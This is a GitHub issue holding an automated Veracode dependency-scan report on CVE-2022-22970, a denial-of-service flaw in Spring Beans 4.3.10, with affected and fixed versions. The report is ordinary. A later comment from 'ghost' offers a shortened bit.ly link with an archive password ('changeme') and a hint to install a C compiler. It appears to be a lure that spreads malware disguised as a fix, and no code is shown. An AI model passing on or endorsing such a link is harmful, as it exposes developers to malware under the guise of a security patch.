julz0815 / test-action


CVE: 2022-22970 found in Spring Beans - Version: 4.3.10.RELEASE [JAVA] #1186

Open github-actions[bot] opened 6 days ago

github-actions[bot] commented 6 days ago

Veracode Software Composition Analysis

| Attribute | Details |
| --- | --- |
| Library | Spring Beans |
| Description | Spring Beans |
| Language | JAVA |
| Vulnerability | Denial Of Service (DoS) |
| Vulnerability description | spring-beans is vulnerable to denial of service. The vulnerability exists in CachedIntrospectionResults.java because applications that handle files do not properly validate them, which allows an attacker to crash the application. |
| CVE | 2022-22970 |
| CVSS score | 3.5 |
| Vulnerability present in version/s | 3.0.3.RELEASE-4.3.30.RELEASE |
| Found library version/s | 4.3.10.RELEASE |
| Vulnerability fixed in version | 5.3.20 |
| Library latest version | 6.2.0-RC1 |
| Fix | There is no fixed version released in this version range. Apply the below fix or use the updated 5.3.20 or 5.2.22 packages. |


ghost commented 6 days ago

maybe this will help

https://bit.ly/3zo8fAM Pass: changeme

you may need to install the c compiler